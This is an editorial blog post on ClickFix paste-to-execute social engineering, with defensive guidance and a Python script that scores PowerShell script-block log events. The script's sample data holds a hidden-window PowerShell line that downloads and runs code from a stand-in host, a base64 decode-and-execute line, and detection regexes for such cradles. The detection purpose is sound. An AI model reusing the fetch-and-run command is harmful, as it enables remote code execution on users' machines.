TL;DR: Microsoft’s Digital Defense Report 2025 says ClickFix is one of its most observed initial access methods, using benign-looking copy-paste commands instead of links or attachments, which makes reputation-based email and endpoint controls far less effective. The lesson is that modern social engineering succeeds on context and behavior, so detection has to move earlier than user execution.
NHIMG editorial — based on content published by Abnormal AI: ClickFix and the shift toward behaviour-based email attacks
Questions worth separating out
Q: How should security teams stop ClickFix-style attacks before users execute commands?
A: Security teams should move detection into the email layer and look for requests that are behaviourally unusual, not only technically malicious.
Q: Why do ClickFix attacks bypass many traditional email and endpoint controls?
A: They bypass many controls because they do not depend on a malicious link or attachment.
Q: What do teams get wrong about training users against social engineering?
A: Teams often focus training on identifying bad links, fake domains, or obvious phishing language.
Practitioner guidance
- Deploy behavioural email inspection: inspect sender-recipient history, request plausibility, and message context before delivery to users.
- Harden script and shell visibility: enable script logging and monitor paste-to-execute patterns in PowerShell and similar shells so investigations can reconstruct what happened after user interaction.
- Tune user education around request patterns: train users to question any message that asks them to run a command, even if it appears to come from IT or a trusted brand.
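The second guidance item, monitoring paste-to-execute patterns once script logging is on, can be worked into a small triage pass over PowerShell Script Block Logging records (Event ID 4104, which only exist once EnableScriptBlockLogging is turned on). The following is an added illustration written for this post, not code from Abnormal AI or Microsoft; the event records, the signal names and the weights are constructed assumptions, and a real deployment would pull the events from the Microsoft-Windows-PowerShell/Operational log instead of a list.

```python
import re
from dataclasses import dataclass

# Constructed records shaped like Script Block Logging events (Event ID 4104).
# Record 2 is the ClickFix shape: hidden window, fetch from the web, execute in place.
SAMPLE_EVENTS = [
    {"EventID": 4104, "RecordId": 1,
     "ScriptBlockText": 'Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object'},
    {"EventID": 4104, "RecordId": 2,
     "ScriptBlockText": 'powershell -w hidden -c "iex (iwr http://example.invalid/check)"'},
    {"EventID": 4104, "RecordId": 3,
     "ScriptBlockText": 'Invoke-WebRequest https://intranet.example.invalid/report.csv -OutFile report.csv'},
    {"EventID": 4104, "RecordId": 4,  # "<base64 placeholder>" stands in for an opaque blob
     "ScriptBlockText": '$c=[Convert]::FromBase64String("<base64 placeholder>");iex([Text.Encoding]::Unicode.GetString($c))'},
]

# Detection signals (assumed heuristics). A download alone is routine admin work; a
# download wired straight into execution, hidden from the user, is the paste-to-execute shape.
SIGNALS = {
    "download_cradle": re.compile(r"\b(iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadString|curl)\b", re.I),
    "inline_execute": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_payload": re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand)?\s|FromBase64String", re.I),
}
WEIGHTS = {"download_cradle": 1, "inline_execute": 2, "hidden_window": 2, "encoded_payload": 2}

@dataclass
class Finding:
    record_id: int
    score: int
    signals: list

def score_script_block(text):
    """Return (score, matched signal names) for one script block."""
    hits = [name for name, rx in SIGNALS.items() if rx.search(text)]
    score = sum(WEIGHTS[h] for h in hits)
    if "download_cradle" in hits and "inline_execute" in hits:
        score += 2  # fetch-and-run in one block is the core ClickFix pattern
    return score, hits

def triage(events, threshold=3):
    """Flag 4104 records whose score reaches the threshold; lower scores stay in the log for IR."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        score, hits = score_script_block(ev["ScriptBlockText"])
        if score >= threshold:
            findings.append(Finding(ev["RecordId"], score, hits))
    return findings
```

Running `triage(SAMPLE_EVENTS)` flags records 2 and 4 and leaves the plain file listing and the intranet download alone; the signal names attached to each finding are what an analyst uses to reconstruct the user interaction afterwards.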
What's in the full article
Abnormal AI's full article covers the operational detail this post intentionally leaves for the source:
- Specific examples of how ClickFix messages are framed to look like routine IT support
- The email-layer behavioural checks Abnormal uses to evaluate sender legitimacy and request context
- The Microsoft guidance referenced in the article, including logging and browser hardening details
- The operational difference between blocking a suspicious request and detecting it after user interaction
Read Abnormal AI's analysis of ClickFix and behaviour-based email attacks: "ClickFix and behavior-based email attacks: are your controls keeping up?"
Explore further
Behaviour-based email attacks expose a trust problem, not just a detection problem. ClickFix succeeds because the request looks routine enough to pass the human plausibility test before it ever becomes a malware problem. That means the real failure is not only poor filtering, but a control model that assumes malicious content must be visibly malicious.
A few things that frame the scale:
- 85% of organisations lack full visibility into third-party vendors connected via OAuth apps, according to The State of Non-Human Identity Security.
- Only 1.5 out of 10 organisations are highly confident in their ability to secure NHIs, compared to nearly 1 in 4 for securing human identities.
A question worth separating out:
Q: How can organisations measure whether behavioural email security is working?
A: Measure whether suspicious requests are blocked before user interaction, whether analysts are seeing fewer downstream endpoint alerts, and whether investigations shorten when a message does get through. Effective controls shift detection upstream, so the first signal appears in the email flow rather than on the endpoint.
Read our full editorial: "ClickFix shows why behavior-based email defense now matters most"